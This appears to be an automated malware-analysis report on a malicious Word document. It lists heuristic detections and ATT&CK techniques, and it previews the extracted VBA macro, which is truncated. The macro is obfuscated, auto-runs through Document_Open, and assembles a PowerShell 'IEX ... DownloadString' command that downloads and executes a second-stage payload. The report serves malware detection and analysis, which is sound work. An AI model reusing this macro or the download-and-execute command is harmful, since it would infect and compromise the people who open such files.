MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro utilizes the Shell() function to execute a PowerShell command. The reconstructed PowerShell command is 'IEX (New-Object Net.WebClient).DownloadString(\'the embedded link')', which indicates it downloads and executes a second-stage payload from the specified URL. This is a common technique for malware droppers.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29011 bytes |
SHA-256: 19b6e575774d85ed3748f8b7d59360f188e302fd4966d03c35cc02e1faa43f71 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XVIscwPw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
AzOCb = 96293 - dqHqj * (20052 * jvUbFN * (97641 / QCGtAc * EDwXzJ - ljwsq))
DsJMod = 20205 - iNWsAF * (30445 * FlQsY * (27765 / LilUZ * OuFPqI - qabiis))
wrYsz = Application.Run("UnncIvYPIsh", "" + mznPLsjp + TXiLvizl + iXlvOMqaBRt + BjwzUkJqX + pjhKP + tvTLpbPP + nzcUfk + mHpASCNP + RwsJuCF + pSsMz + mdVNzwpjkOC + BibUQVNUM + bWdwncMUwMoaz + JlBQSQd)
bfnSHD = 59768 - fMjdBY * (75653 * INoJvz * (10789 / KCcnj * cziqRM - HpnPSt))
VRfKiK = 61372 - zWDOq * (56676 * likQdT * (37972 / sYZzru * ZzMja - zCmnj))
CZwKQd = 51229 - biiZlH * (9491 * rDikjv * (21864 / aABXB * dDUWHd - dPTBFG))
End Sub
Attribute VB_Name = "nwzkMYOLAvHOp"
Function iXlvOMqaBRt()
On Error Resume Next
QQjbH = nYUUwl / nEctdq - HRjKSm - 77250
MdRcD = (lGsPMS - WUSBmk - 85857 - JJfFci / 46099 + bfkLFj - wjpzww / jlblG) + XrVSY + DTmXb
zkJEBZbuNP = "" + INzkhowK + SrDWYjdd + "PowE" + sukXGwhZJUoHw + jlJGQjjI + "Rs" + PONmlIKh + OdcijHXAz + "hEL" + vvKpvUXi + lDNrkTmY + "L " + aLowFJfWJIi + wUSCzqom + Chr(34) + "('" + JdaOnwnkcnr + HMjloAZBbbrO + "36,"
RphXq = (52902 / fUfurY * 41993 + 46080 - (11217 * UOkLq + 26820 + zmZYi))
ahhkZBLzBz = "" + QhWvuQBJwcrDrz + dVGWAmG + "69Z" + dXECLzTwvbq + LETEljzKNCJ + "75" + MuMzdbvUQtwGnf + vVlEBKCD + "Q11"
DcEUD = (73 / CZWuz * 42501 + 99823 - (47300 * AtPqj + 95216 + SzNzo))
WaRQV = (89639 / QkYkwz * 29371 + 7062 - (15684 * LWwwEb + 6568 + jXRtB))
YnnIKHlzn = "" + ijbsUKiEun + bJbhRIAQAl + "1,6" + FamVpAjfJzL + HEMRoVCMZaIYji + "1Q11" + zWwiAmuYNP + oOczInJ + "0,10" + wLQzPjzdzJRCJ + PpuUJnEYbwX + "1i11" + LPtYchAKjfkFvv + cBfEziS + "9C45" + tBunoArWARhPt + JRiKJPOsoSz + "l1" + FwcwAjijFXrit + diqiaDuizIjafI + "11" + pCzQBpkPJr + urfPfTO + "C98d" + QWoLQdoQJDX + CcuSsow + "106"
zLdvjN = cCaYu * lzTZwj / Tuqhsd / JrkDkz / 91974 * fLHmz - 38048 * 96579
jHqoI = UuLuBs * jKElM / zAoYEq / DVNbaG / 3765 * nhVcUL - 92873 * 29579
kVDcX = "" + swkfBlziG + UvDFiwk + "s10" + ozmiRHRMjQ + PPAfzdqwFCqmE + "1Z99" + EjVVNmDiv + NtUlBqo + ",116" + jDaiUuT + HAaGrNfKvHEL + "Z32" + TtQwiTA + sFjBFrBSSlsnLf + ",78" + GFrujGu + HkEwowlHCiBILa + "s101"
iXlvOMqaBRt = "" + pmasRHOItXNIFS + nDwGzUim + zkJEBZbuNP + JzGtufXBrUT + zWvEQldCjwqU + ahhkZBLzBz + MvUHnmkwRCA + lDbQqkWwkCQN + YnnIKHlzn + dZAPZmDLFWM + wAFsEnDrw + kVDcX
GpbpGd = YRAEco * Mfzks / nYbIv / lrErm / 74276 * QOkWpD - 65633 * 56322
zjmdct = umJGZ * maria / EDKUZz / JLZwlf / 32261 * QpzZi - 22619 * 34730
End Function
Function BjwzUkJqX()
On Error Resume Next
Mrbanu = bZzGhN * tjsFT / ORrYAb / HhKrN / 9465 * vEvKEK - 13077 * 21292
WtVAnGFFFv = "" + jWCwTpYG + vADaLkduO + "s1" + dQXpnhAJTDEDN + GKNUTHL + "16" + DsksadQ + SDGfHfHXzaNr + "l46l" + GGdSjumkRkXlv + ipmFVvQw + "87" + hMwKlSJ + dmwLkEv + "s10" + VIVkKOOkblbu + COzhqafR + "1i9" + tTVmiBBaOid + zChwBrXiIniu + "8Z6" + XEGGDtqrqtbG + BjMiihCiJiia + "7d10" + ljrrhQi + XZZqGLoU + "8C1" + ncbaAMPjs + bcDpGKBkZIF + "05Z" + oEIqvTUJjJ + JFrfRhmZfw + "101s"
BzBmk = IiwDm * DYnZaS / TAQwFK / HaSGt / 84419 * movSi - 48027 * 27358
djofHU = "" + GSvctuNwMFd + DvbjOhPqJunQ + "110Q" + HstdTjnqmPbOj + hmiQCsWH + "116C" + SEmwYILIDGGScJ + MJMEABJibHIAhw + "59O3" + BdBcBuOGQFcz + KVaFjMuow + "6O7" + DUQzKbFVVQwINw + FnvZKiMzmacRYq + "9Z8" + khzZzGFdXii + NMJORpAD + "1Q7" + VISNkznwfETX + szwiRBfDOlZNTC + "0i6" + LbtzcRi + ikhwtspjKW + "1i" + SlpESthnXjkpf + iiVaSENnRwEUs + "39i1" + IjnJtpDsKXz + wzrTBzLwpvAlEw + "04," + NZoDqYE + wDbpLDVwQp + "116l"
wJMwC = FNwJP * RmQzn / osHlBh / oUqMX / 96410 * caBtj - 77331 * 9786
lStYi = kmYpq * mzzICG / vpwCwk / isfmo / 17657 * wcGvf - 16165 * 10003
iiZSDzTjb = "" + qitkhpqwr + bHLIiYOtO + "11" + LuurlXNzVY + uWnnGfAOfQEAS + "6d11" + EPqXYQRSzqqE + sMrWSQlrlINO + "2s" + vqtYvmJjfBjYdE + QajdnDMiAYzNih
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.